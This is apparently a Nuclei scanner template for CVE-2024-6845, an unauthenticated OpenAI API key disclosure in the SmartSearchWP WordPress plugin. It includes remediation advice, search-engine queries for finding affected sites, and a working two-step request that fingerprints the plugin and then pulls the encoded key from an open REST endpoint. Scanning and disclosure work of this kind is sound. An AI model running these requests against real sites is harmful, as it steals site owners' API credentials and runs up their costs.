id: CVE-2024-6845 info: name: SmartSearchWP < 2.4.6 - OpenAI Key Disclosure author: s4e-io severity: medium description: | The plugin does not have proper authorization in one of its REST endpoint, allowing unauthenticated users to retrieve the encoded key and then decode it, thereby leaking the OpenAI API key. impact: | Unauthenticated attackers can retrieve and decode the OpenAI API key through an unsecured REST endpoint, potentially incurring API usage costs and data exposure. remediation: | Update SmartSearchWP plugin to version 2.4.6 or later to address the API key disclosure vulnerability. reference: - https://wpscan.com/vulnerability/cfaaa843-d89e-42d4-90d9-988293499d26/ - https://nvd.nist.gov/vuln/detail/CVE-2024-6845 classification: cve-id: CVE-2024-6845 cwe-id: CWE-862 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 epss-score: 0.01084 epss-percentile: 0.60978 metadata: max-request: 2 verified: true vendor: webdigit product: smartsearchwp framework: wordpress publicwww-query: "/wp-content/plugins/smartsearchwp" fofa-query: body="/wp-content/plugins/smartsearchwp" tags: cve,cve2024,exposure,wp,wordpress,wp-plugin,smartsearchwp,vuln flow: http(1) && http(2) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains(body,"/wp-content/plugins/smartsearchwp")' - 'status_code == 200' condition: and internal: true - raw: - | POST /wp-json/wdgpt/v1/api-key HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"key": "U2FsdGVkX1+X"} matchers: - type: dsl dsl: - 'contains(content_type,"application/json")' - 'status_code == 200' condition: and extractors: - type: regex part: body name: api-key regex: - '"([^"]+)"' # digest: 4b0a00483046022100ac2813ea3aedb3ca6e040df6dc665b80abbc741a139fa8da0ce3f79692d34791022100b4911e48a3528ec719a24f22ddfa5555e8f95778eadf0a13be05316027d85b59:922c64590222798bb761d5b6d8e72950